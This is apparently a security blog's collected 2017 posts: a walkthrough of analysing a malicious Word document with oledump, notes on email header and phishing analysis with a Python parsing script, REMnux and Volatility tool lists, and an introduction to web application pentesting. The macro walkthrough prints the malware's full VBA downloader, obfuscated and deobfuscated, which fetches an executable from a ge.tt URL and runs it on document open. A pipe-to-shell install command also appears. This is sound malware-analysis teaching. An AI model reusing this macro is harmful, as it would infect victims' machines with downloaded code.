Sunday, 4 June 2017

Analyzing Microsoft Office Files

Use any of the below tools for analyzing office documents.

oledump.py / officeparser.py / olevba.py / pyOLEScanner.py

1. Find malicious code
2. Extract code / Deobfuscate
3. Analyze code
4. Extract host and network indicators

 Microsoft Office Binary File Format Notes
-------- -------- -------- ------- --------- --------
Structured Storage (OLE SS) defines a file system inside the binary Microsoft Office file.
Data can be “storage” (folder) and “stream” (file).
Excel stores data inside the “workbook” stream.
PowerPoint stores data inside the “PowerPoint Document” stream.
Word stores data inside various streams.

 Tools for Analyzing Microsoft Office Files
----------- ---------- ---------- ------------ -------
"OfficeMalScanner" locates shellcode and VBA macros from MS Office (DOC, XLS, and PPT) files.

"MalHost-Setup" extracts shellcode from a given offset in an MS Office file and embeds it an EXE file for further analysis. (Part of OfficeMalScanner).

"Offvis" shows raw contents and structure of an MS Office file, and identifies some common exploits.

"Hachoir-urwid" can navigate through the structure of binary Office files and view stream contents.
"Office Binary Translator" converts DOC, PPT, and XLS files into Open XML files (includes BiffView tool).

"pyOLEScanner.py" can examine and decode some aspects of malicious binary Office files.
FileHex (not free) and "FileInsight" hex editors can parse and edit OLE structures.

I.

 1. Start analyzing file with # file document

 # file 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin

Output provides a lot of useful information including:

39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin: Composite Document File V2 Document (File format: CDF V2 Document)
Little Endian
Os: Windows,
Version 6.1,
Code page: 1252,
Author: Admin,
Name of Creating Application: Microsoft Office Word,
Total Editing Time: 01:47:00, Create Time/Date: Tue Jan 13 00:32:00 2015,
                                 Last Saved Time/Date: Thu May  7 04:22:00 2015,
Number of Pages: 1, Number of Words: 21, Number of Characters: 122, Security: 0,
                             Template: Normal, Last Saved By: Raz0r, Revision Number: 198,

 2. Next we will examine file with oledump.py 
   
oledump.py is a program to analyze OLE files (Compound File Binary Format). These files contain streams of data. oledump allows you to analyze these streams.
 
Many applications use this file format, the best known is MS Office. .doc, .xls, .ppt, … are OLE files (docx, xlsx, … is the new file format: XML inside ZIP).  

oledump has an embedded man page: run oledump.py -m to view it.

oledump.py 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      9602 '1Table'
  5:    137803 'Data'
  6:       539 'Macros/PROJECT'
  7:        71 'Macros/PROJECTwm'
  8: M    5258 'Macros/VBA/NewMacros'
  9: m     938 'Macros/VBA/ThisDocument'
 10:      3483 'Macros/VBA/_VBA_PROJECT'
 11:       578 'Macros/VBA/dir'
 12:      4096 'WordDocument'
remnux@remnux:~/Desktop/Malicious-files/doc$

[(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)]

  One of the cool things about oledump.py is its ability to mark streams that contain VBA code.
 
In the above output we can see two streams called NewMacros and ThisDocument. Letters M and m indicate that VBA code is present. Lowercase m means VBA contains only attributes statements (less interesting):
 
$ oledump.py -s9 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
remnux@remnux:~/Desktop/Malicious-files/doc$  

Given stream can be viewed by adding -s with an object number. As we know we are dealing with the VBA code the -v option will instruct oledump.py to decompress VBA code and make it easy to read.

Let’s dump it for later comparison with other tools.
$ oledump.py -s9 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin > attribute_code

 Now let’s move to the stream marked with capital M, this is usually where analysts find juicy stuff:

$ oledump.py -s8 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal JhjBjhGJHBfgjhffGggfGVgfVFGuHgHfGcV As Long, ByVal GyghGGBtgnfgdfGDFRGhojoJGBJFGhjFghJfHgh As String, ByVal tGtgfRDEVDFVUJUjhJGHJkujkuhJihuhBfgBF As String, ByVal lkaaJQQSxJfdLyE As Long, ByVal hujhBjhBfvcVcVdsswwsDswdFfgHUJFGHUJOIJJHhHjHGYYFtBVcfGGdGgDFGHuDfghuhDGhjjk As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal gBfGFGHFGhRfghrtjgHJfGHJFGHjTyhjGFGVRFTRftyFtyFghDFvtRTRGfGDTR As Long, ByVal ltnbTaRjJOa6JYn As String, ByVal liCRZKNefyicowI As String, ByVal lGONydFEvaD5IuX As Long, ByVal lmRYfcuLs5uEk2Z As Long) As Long
#End If
 
Sub AutoOpen()
    Dim loyagdbd As String
    Dim hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg As String
    hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg = CurDir()
    Dim NewPath As String
    NewPath = Replace(hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
    hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
    iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
    Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
    ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
    lkFjuexVzhTjcrT = ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV & iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv & ""
    iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG = lkFjuexVzhTjcrT
    OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb = NewPath & Split(LotsofFuckingStringinallinOne)(1) & hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg + CheckNumbers
    lRoosrSIPgRZZm4 = OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb
    lFA9cYQDsQOBIWU = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb & CheckNumbers & CheckNumbers, 0, 0)
     
   If Dir(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) <> "" Then
   Dim oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh As Object
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh.exec(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb)
   End If
End Sub

 It is safe to say we found our malicious code! We will dump the code for further analysis.

$ oledump.py -s8 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin > malicious-code

Before we will jump into deobfuscation and code analysis check how above tools cope with the same malicious file.
[ in software development, obfuscation is the deliberate act of creating source or machine code that is difficult for humans to understand. Like obfuscation in natural language, it may use needlessly roundabout expressions to compose statements.”]

https://www.upwork.com/hiring/development/understanding-obfuscated-code-deobfuscate-php-javascript/


II.

1. Deobfuscation / Code deobfuscation

Unfortunately neither of the tools is able to deobfuscate the code it would be too easy! So far we researched different methods of finding and extracting malicious code from OLE documents. It is high time to deobfuscate this,

There is never a “one fits all” solution to deobfuscate code. Good thing to start with is to clean up the code from randomly generated variable names. For this just open the code in any text editor and use “find and replace” feature to replace randomly named variables into something more readable.

I like to rename variables so they start with capital letter informing me about the variable type, for instance:

S_var1 means this variable is of a String type.

This is how code looks like after initial clean up:

  Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If

Sub AutoOpen()
    Dim S_var5 As String
    Dim S_var6 As String
    S_var6 = CurDir()
    Dim NewPath As String
    NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim S_var7 As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
    S_var7 = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
    S_var8 = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
    Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
    S_var9 = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
    S_var10 = S_var9 & S_var8 & ""
    S_var11 = S_var10
    S_var12 = NewPath & Split(LotsofFuckingStringinallinOne)(1) & S_var7 + CheckNumbers
    S_var13 = S_var12
    S_var14 = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + S_var11 & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & S_var12 & CheckNumbers & CheckNumbers, 0, 0)

   If Dir(S_var12) <> "" Then
   Dim O_var1 As Object
   Set O_var1 = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
   Set O_var1 = O_var1.exec(S_var12)
   End If
End Sub

  After a few operations code becomes much more readable:-
 
  Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If

Sub AutoOpen()
    Dim S_var5 As String
    Dim S_var6 As String
    S_var6 = CurDir()
    Dim NewPath As String
    NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim S_var7 As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = "wscript."
    S_var7 = "SbieCtrl".exe"
    S_var8 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    Dim IsProgramRegistered As String: IsProgramRegistered = "wscripts"
    S_var9 = ""
    S_var10 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    S_var11 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    S_var12 = "C:\Users\Public\Documents\SbieCtrl.exe"
    S_var13 = "C:\Users\Public\Documents\SbieCtrl.exe"
    S_var14 = ProudtoBecomeaNepaliReverseEngineer(0,"http://ge.tt/api/1/files/2gmBurF2/0/blob?download","C:\Users\Public\Documents\SbieCtrl.exe", 0, 0)
     
   If Dir(S_var12) <> "" Then
   Dim O_var1 As Object
   Set O_var1 = CreateObject("wscript.shell")
   Set O_var1 = O_var1.exec("C:\Users\Public\Documents\SbieCtrl.exe")
   End If
End Sub

Code analysis summary:

AutoOpen() will be executed after the document is opened.

ProudtoBecomeNepaliReverseEngineer is just an alias to URLDownloadToFile()

URLDownloadToFile() accepts five parameters, including URL address
     http://ge.tt/api/1/files/2gmBurF2/0/blob?download and a file name C:\Users\Public\Documents\SbieCtrl.exe.

Both information serve as a network and host indicators that might be used to check for successful compromise.

Spam and Phishing Analysis

         Email Header Analysis

X-Originating-IP: [Ip addres from where this mail is coming from]
 Here if the mail is passing through different mail server, them we have different X-Originating IP's in the header. But first one in the list is from where it is originated and passed through other mail server's.

Date: This shows the date and time the email message was composed.

From: This displays who the message is from, however, this can be easily forged and can be the least reliable.

Reply-To: The email address for return mail.

To: This shows to whom the message was addressed, but may not contain the recipient's address.

Subject: This is what the sender placed as a topic of the email content.

X-Spam-Flag: YES ----- It is flagged as spam and will go to spam folder, some time
                                             it may be flag as Phish etc etc.

X-SpamInfo: spam detected heuristically.

Return-path : Some times we can see different return path address instead of sender.  The email address for return mail. This is the same as "Reply-To:".

Here if sender_mail_id(From:) is spoofed, then From: and Reply-To: are different.It has to be same if it is genuine.

Here From: field they can spoof, so when you are checking check for Reply-To: field so we can know to whom mail will go if we reply.

Message-ID: we can search in our email protecting tool to how many user's this particular mail is delivered.

Envelope-To : This header shows that this email was delivered to the mailbox of a subscriber whose email address is user@example.com.

Delivery Date : This shows the date and time at which the email was received by your (mt) service or email client.

Received : The received is the most important part of the email header and is usually the most reliable. They form a list of all the servers/computers through which the message traveled in order to reach you. The received lines are best read from bottom to top. That is, the first "Received:" line is your own system or mail server. The last "Received:" line is where the mail originated. Each mail system has their own style of "Received:" line. A "Received:" line typically identifies the machine that received the mail and the machine from which the mail was received.

If there is any links in the mail it will show in header separately and we can check the url reputation in VT, urlquery. In header original URL it will show. But in mail it may be different URL. (This may be depend how you / email security solution providers configure your mail service).

Check this script for easy analysis of above details from an email header,
   http://ctechz.blogspot.in/2017/06/python-script-for-email-header-analysis.html

            How you can check against Spam and Phishing attacks

Email AddressConfirm the sender's e-mail address
                           •Do you know the person or entity?
                           •Are there any misspellings or unusual domains in the address
Links:  Confirm the links are to reputable or known websites
                •Is it recognizable—not a random IP address?​
                •Does it include "https"—indicating it’s a secure site?
Even if the link pointing towards a https:// url then also check to whome that certificate is issued. Because Authority will not issue same certificate to different users. So check for certificate abuse.

            https://textslashplain.com/2017/01/16/certified-malice/

Attachments:  Think carefully about opening an attachment from an unknown sender. Is the attachment safe to open? If you open an attachment with macros (for example, file extensions ending with “m”), your device may be infected with a virus or malware, which can compromise sensitive information.

ContentClosely review the content
       •Does it include unusual requests for sensitive information or unrealistic offers?
       •Does it have spelling and grammatical errors?​
       •Does it include inconsistent formatting and images?​
       •Does the message instruct you to break protocol or follow a different process 
           or procedure than you are used to?

Email Header Analysis:  
        https://ctechz.blogspot.in/2017/06/python-script-for-email-header-analysis.html

Report PhishingUse the Report Phishing button to report suspicious e-mails to 
 respective team. Or Send the mail to the respective team as an attachment.

Friday, 2 June 2017

Python Script for Email Header Analysis

# Python Script for Analyzing Email Headers, which helps to identify spam and
    spoofed mails
# Save the script as emailanalysis.py
# Copy Mail header in a file and give it as this script's input

import re
def matchre(data,*args):
    for regstr in args:
        matchObj = re.search( regstr+'.*', data, re.M|re.I)
        if matchObj:
            print matchObj.group(0).lstrip().rstrip()
        else:
            print "No ",regstr,"found"
print
print("Email Header Analysis by Jeffin")
print
filename= raw_input("Enter path for email header file: ");
print
fo = open(filename, "r") #fo=filehandle
data=fo.read()

matchre(data,"From:")
print
matchre(data,"Subject:")
print
matchre(data,"Date:")
print
matchre(data,"To:")
print
#matchre(data,"delivered-to:")
#print

matchre(data,"X-Originating-IP:")
print
matchre(data,"Reply-To:")
print
matchre(data,"Return-path:")
print
matchre(data,"X-Spam-Flag:")
print
matchre(data,"MIME-version:")
print
matchre(data,"Message-ID:")
print

fo.close()

#Envelope-To: user@example.com
#Delivery-Date:
#X-Spam-Status:


Thursday, 25 May 2017

Malware Analysis + RemNux


https://digital-forensics.sans.org/blog/2015/06/13/how-to-install-sift-workstation-and-remnux-on-the-same-forensics-system

 Malware Analysis Using RemNux

REMnux® is a free Linux toolkit for assisting malware analysts with reverse-engineering malicious software.

This lightweight distro incorporates many tools for analyzing Windows and Linux malware,
examining browser-based threats such as obfuscated JavaScript, exploring suspicious document files and taking apart other malicious artifacts. Investigators can also use the distro to intercept suspicious network traffic in an isolated lab when performing behavioral malware analysis.

After installing RemNux connect to internet and run the “update-remnux full” command.

Alternatively, you can add REMnux software to an existing SIFT Workstation system. To do that, run the following command on SIFT:

wget --quiet -O - https://remnux.org/get-remnux.sh | sudo bash

http://sift.readthedocs.io/en/latest/

Below are some of the malware analysis tasks you can perform on REMnux. For the full listing of the many command-line tools available in this distro, see remnux.org.

 [ SIFT (SANS Investigative Forensics Toolkit)
     http://sift.readthedocs.io/en/latest/
                                       ]

https://remnux.org/docs/

https://www.decalage.info/en/security

https://www.digitalmunition.me/2015/06/remnux-v6-a-linux-toolkit-for-reverse-engineering-and-analyzing-malware/

 Statically Examine Files

• Inspect file properties using pescanner, pestr, pyew, readpe, pedump,
      peframe, signsrch, and readpe.py
• Investigate binary files in-depth using bokken, vivbin, udcli, RATDecoders,
     radare2, yara, and wxHexEditor
• Deobfuscate contents with xorsearch, unxor.py, Balbuzard, NoMoreXOR.py,
    brxor.py, and xortool
• Examine memory snapshots using Rekall and Volatility
• Assess packed files using densityscout, bytehist, packerid, and upx
• Extract and carve file contents using hachoir-subfile, bulk_extractor,
    scalpel, foremost
• Scan files for malware signatures using clamscan after refreshing signatures with freshclam
• Examine and track multiple malware samples with mas, viper, maltrieve,
    and Ragpicker
• Work with file hashes using nsrllookup, Automater, hash_id, ssdeep,
   totalhash, virustotalsearch, and vt
• Define signatures with yaraGenerator.py, autorule.py, IOCextractor.py, and rule-editor

 Handle Network Interactions

• Analyze network traffic with wireshark, ngrep, tcpick, tcpxtract, tcpflow,
   and tcpdump
• Intercept all laboratory traffic destined for IP addresses using accept-all-ips
• Analyze web traffic with burpsuite, mitmproxy, CapTipper, and NetworkMiner
• Implement common network services using fakedns, fakesmtp, inetsim,
   ircd start, and httpd start

 Examine Browser Malware

• Deobfuscate JavaScript with SpiderMonkey (js), d8, rhino-debugger,
  and Firebug
• Define JavaScript objects for SpiderMonkey using /usr/share/remnux/objects.js
• Clean up JavaScript with js-beautify
• Retrieve web pages with wget and curl
• Examine malicious Flash files with swfdump, flare, RABCDAsm, xxxswf.py, and extract_swf
• Analyze Java malware using idx_parser.py, cfr, jad, jd-gui, and Javassist
• Inspect malicious websites and domains using thug, Automater, pdnstool.py, and passive.py

 Examine Document Files

• Analyze suspicious Microsoft Office documents with officeparser.py,
  oletools, libolecf, and oledump.py
• Examine PDFs using pdfid, pdfwalker, pdf-parser, pdfdecompress,
  pdfxray_lite, pyew, and peepdf
• Extract JavaScript or SWFs from PDFs using pdfextract, pdfwalker, pdf-parser, and swf_mastah
• Examine shellcode using shellcode2exe.py, sctest, dism-this,
  unicode2hex-escaped, m2elf, and dism-this.py

 Investigate Linux Malware

• Disassemble and debug binaries using bokken, vivbin, edb, gdb, udcli, radare2, and objdump
• Examine the system during behavioral analysis with sysdig, unhide, strace,
   and ltrace
• Examine memory snapshots using Rekall and Volatility
• Decode Android malware using Androwarn and AndroGuard

 Windows Memory Analysis – Rogue Processes Detection

* psxview Find hidden processes using cross-view # vol.py psxview
* pstree Display parent-process relationships # vol.py pstree

 Windows Memory Analysis – Code Injection Detection

malfind        Find injected code and dump sections
-p     Show information only for specific PIDs
-o     Provide physical offset of single process to scan
--dump-dir  Directory to save memory sections
                        # vol.py malfind --dump-dir ./output_dir
ldrmodules  Detect unlinked DLLs
-p                 Show information only for specific PIDs
-v                 Verbose: show full paths from three DLL lists
                        # vol.py ldrmodules –p 868 -v

 Windows Memory Analysis – Dump Suspicious Processes

dlldump      Extract DLLs from specific processes
-p Dump      DLLs only for specific PIDs
-b Dump      DLLs from process at base offset
-r Dump      DLLs matching REGEX name
--dump-dir    Directory to save extracted files
 # vol.py dlldump --dump-dir=./output –r metsrv

moddump - Extract kernel drivers
-b  Dump driver using base address (from modscan)
-r  Dump drivers matching REGEX name
--dump-dir        Directory to save extracted files
# vol.py moddump --dump-dir=./output –r gaopdx

procdump Dump process to executable sample
-p Dump only specific PIDs
-o Specify process by physical memory offset
-n Use REGEX to specify process
--dump-dir       Directory to save extracted files
   # vol.py procdump --dump-dir=./output –p 868

memdump Dump every memory section into a single file
-p Dump memory sections from these PIDs
-n Use REGEX to specify process
--dump-dir       Directory to save extracted files
    # vol.py memdump –dump-dir=./output –p 868

dumpfiles Dump File_Objects from file cache
-Q Extract using physical offset
-r Extract using REGEX (-i for case insensitive)
--dump-dir       Directory to save extracted files
    # vol.py dumpfiles –dump-dir=./output –r \\.exe


WebApplication PenTesting + Analysis

                                     How to identify malicious HTTP Requests

BeEF = The Browser Exploitation Framework, a penetration testing tool that focuses on the web browser.

Brute force = an automated process of trial and error used to guess login credentials and gain access to the application.

CSRF = Cross-Site Request Forgery is an attack which forces the user to execute arbitrary actions in the web application while he is authenticated. With a successful CSRF attack it is possible to compromise the whole application.

DNS = Domain Name System

Interception proxy = A tool that allows to intercept and modify traffic between the browser and the target application.

Path traversal = a technique used to inject malicious input into web applications and retrieve files beyond the document root directory

SamuraiWTF = Live linux environment for web pen-testing. Contains numerous open source and free tools that can be used for testing and attacking web sites.

SQL = Structured Query Language

SQL injection = attack used to exploit web applications back end database with arbitrary sql input

Tcpdump = a command-line packet analyzer

URL = Uniform Resource Locator

Whois = query and response protocol for searching domain names and IP addresses

Wireshark = network protocol analyzer

XAMPP = Apache distribution containing MySQL, PHP and Perl

XSS = Cross Site Scripting is a type of attack, in which malicious scripts are injected
into a web site. The malicious script can access cookies, session information or other sensitive user-related information. ”Cross-Site Scripting” originally referred to the act of loading the attacked, third-party web application from an unrelated attack site, in a manner that executes a fragment of JavaScript prepared by the attacker.

Hypertext transfer protocol (HTTP) is a stateless protocol and it uses a message-based model. Basically, a client sends a request message and the server returns a response message.

 When attacking a web application the payload is sent in the request message. There are different possibilities to do this; using dangerous HTTP methods, modifying the request parameters or sending other malicious traffic.

HTTP methods are functions that a web server provides to process a request.

GET is most commonly used to retrieve a resource from a web server. It will send the parameters directly in the URL query string.

POST method is used to perform actions and allows the data to be sent also in the body of the message.

Both of these methods are interesting for an attacker when it comes to injecting malicious content.

Injecting the request parameters and headers with arbitrary input is not the only way to attack the web application. There are also different methods, such as mapping and discovery.

The mapping phase consists of several components, such as port scanning, OS fingerprinting and spidering.

Discovery is the phase that explicitly sends ”malicious” traffic to target system. It should be also noted that some aggressive mapping (e.g. port scanning) is considered malicious.

As the application is being targeted or has been defaced, it is up to the audit logs to contain any valuable information about the intrusion attempts. With effective audit logs it can be possible to identify exactly what type of attack has taken in place.

2. Testing Environment

Target: A free open source web application that contains OWASP Top 10 vulnerabilities.

 VM Machine download:

https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=Main
       
Mutillidae will be used as a target when sending malicious HTTP requests from the SamuraiWTF virtual machine.    

 https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project


Attacker : A VM which will have latest Samurai Web Testing Framework 0.9.9 version with updated version of tools

                http://samurai.inguardians.com/

                http://www.samurai-wtf.org/

Tools using: SamuraiWTF And Mutillidae

To analyze packets and capturing the malicious traffic tcpdump and wireshark will be
installed. Also apache access logs are analyzed to identify any malicious activity.

 [
   Browser Cookies are text files retained on computers by browsers containing various information in regards to a specific website visit. Another way to think of this is that a cookie is a message given to a web browser from a web server that is then sent back to the web server whenever the browser requests a page from it. ]

3. Overview of HTTP messages

Hypertext Transfer Protocol (HTTP) is an application-level protocol that was first used to retrieve only static-based resources.

 HTTP is a stateless protocol.  Basically a client sends a request message to the server and then it returns a response message back to the client. Each of these transactions are autonomous and may use a different TCP connection.

Basic knowledge about the HTTP messages is needed when exploiting web applications.

When sending malicious requests to the application, most commonly headers like the method, user agent and cookie are fiddled. There are also a huge variety of input-based vulnerabilities. These attacks involve submitting arbitrary input either to the URL parameters or into the HTTP payload. For example, SQL injection and Crosssite scripting fall into this category.

The GET method is used to request a web page and it also passes any parameters in the URL field. Also the user-agent field is sent for identifying the client.
                                          
GET /mutillidae/ HTTP/1.1
Host: 172.16.40.132
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11)
Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11
Accept: text/html,application/xhtml+xml,application/xml;
Accept-Language: en-US
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;
Keep-Alive: 115
Connection: keep-alive
Cookie: showhints=0; PHPSESSID=60kmpkstt1mcnpps5jppflkgjo

                                      Above: HTTP Request message

 The server responds with the status code and message. The server also sends a date header and optionally other headers like server and in this case a logged-in-user which may disclose sensitive information regarding the server, installed modules and the end user.

HTTP/1.1 200 OK
Date: Sat, 28 Jul 2012 14:20:58 GMT
Server: Apache/2.4.2 (Unix) OpenSSL/1.0.1c PHP/5.4.4
X-Powered-By: PHP/5.4.4
Logged-In-User:
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE HTML PUBLIC ”-//W3C//DTD HTML 4.01
Transitional//EN” ”http://www.w3.org/TR/1999/REC-html401-
19991224/loose.dtd”>
<html>

                Above: HTTP Response message

3.1 HTTP Methods

 Links: https://www.owasp.org/index.php/Test_HTTP_Methods_(OTG-CONFIG-006)

These methods are GET, POST,HEAD, PUT, DELETE, TRACE, OPTIONS and CONNECT. It should be noted that not all methods are implemented by every server. For servers to be compliant with HTTP 1.1 they must implement at least the GET and HEAD methods for its resources. There really is not any ”safe” methods as most of these methods can be used when targeting a web application.

The GET and POST are used to request a web page and are the two most common being used in HTTP.

The downside of GET is that it passes any parameters via the URL and is easy to manipulate. It is recommended to use POST for requests because the parameters are sent in the HTTP payload.

HEAD works exactly like GET, but the server returns only the headers in the response.

The OPTIONS method asks the server which methods are supported in the web server. This provides a means for an attacker to determine which methods can be used for attacks.

The TRACE method allows client to see how its request looks when it finally makes it to the server.
Attacker can use this information to see any if any changes is made to the request by firewalls,  proxies, gateways, or other applications.

The following methods, PUT and DELETE are the most dangerous ones as they can cause a significant security risk to the application.

The PUT method can be used to upload any kind of malicious data to the server.

